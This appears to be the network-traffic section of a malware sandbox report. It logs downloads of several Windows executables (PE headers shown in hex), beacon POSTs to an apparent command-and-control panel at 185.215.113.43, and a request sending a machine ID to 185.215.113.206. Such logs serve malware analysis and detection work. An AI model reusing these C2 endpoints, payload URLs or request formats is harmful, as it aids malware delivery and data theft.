                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 20:09:16 GMTContent-Type: application/octet-streamContent-Length: 1966080Last-Modified: Mon, 09 Dec 2024 17:50:43 GMTConnection: keep-aliveETag: "67572df3-1e0000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 50 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 86 00 00 04 00 00 68 c0 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 8e 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 29 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 6c 72 66 6e 68 6a 75 00 e0 1a 00 00 60 6b 00 00 de 1a 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 75 75 73 79 79 63 7a 00 10 00 00 00 40 86 00 00 04 00 00 00 da 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 86 00 00 22 00 00 00 de 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 20:09:24 GMTContent-Type: application/octet-streamContent-Length: 1858560Last-Modified: Mon, 09 Dec 2024 20:05:43 GMTConnection: keep-aliveETag: "67574d97-1c5c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 b2 00 00 00 00 00 00 00 40 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 49 00 00 04 00 00 9b 7b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 40 05 00 70 00 00 00 00 30 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 20 05 00 00 10 00 00 00 42 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 30 05 00 00 04 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 6b 6a 66 67 68 66 67 00 e0 19 00 00 50 2f 00 00 dc 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 74 77 77 69 76 67 62 00 10 00 00 00 30 49 00 00 04 00 00 00 36 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 49 00 00 22 00 00 00 3a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 20:09:33 GMTContent-Type: application/octet-streamContent-Length: 1831936Last-Modified: Mon, 09 Dec 2024 20:05:50 GMTConnection: keep-aliveETag: "67574d9e-1bf400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 30 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6a 00 00 04 00 00 df 71 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6b 66 76 6a 61 6a 70 00 50 1a 00 00 d0 4f 00 00 50 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6f 66 70 63 78 6e 6e 00 10 00 00 00 20 6a 00 00 04 00 00 00 ce 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6a 00 00 22 00 00 00 d2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 20:09:41 GMTContent-Type: application/octet-streamContent-Length: 973312Last-Modified: Mon, 09 Dec 2024 20:03:57 GMTConnection: keep-aliveETag: "67574d2d-eda00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 25 4d 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 2a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 c6 02 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f0 6f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 6f 01 00 00 40 0d 00 00 70 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 64 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 20:09:49 GMTContent-Type: application/octet-streamContent-Length: 2793472Last-Modified: Mon, 09 Dec 2024 20:04:25 GMTConnection: keep-aliveETag: "67574d49-2aa000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 47 78 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 78 6e 61 6a 67 6f 6d 00 40 2a 00 00 a0 00 00 00 3e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 65 79 75 71 71 79 66 00 20 00 00 00 e0 2a 00 00 06 00 00 00 78 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 7e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 20:09:56 GMTContent-Type: application/octet-streamContent-Length: 2793472Last-Modified: Mon, 09 Dec 2024 20:04:27 GMTConnection: keep-aliveETag: "67574d4b-2aa000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 47 78 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 69 78 6e 61 6a 67 6f 6d 00 40 2a 00 00 a0 00 00 00 3e 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 65 79 75 71 71 79 66 00 20 00 00 00 e0 2a 00 00 06 00 00 00 78 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 00 2b 00 00 22 00 00 00 7e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013509001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013510001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013511001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013512001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 32 42 44 33 34 30 35 45 36 46 31 33 35 30 38 32 37 30 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 2d 2d 0d 0a Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="hwid"DC2BD3405E6F1350827015------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="build"stok------KEGCBFCBFBKFHIECAFCF--
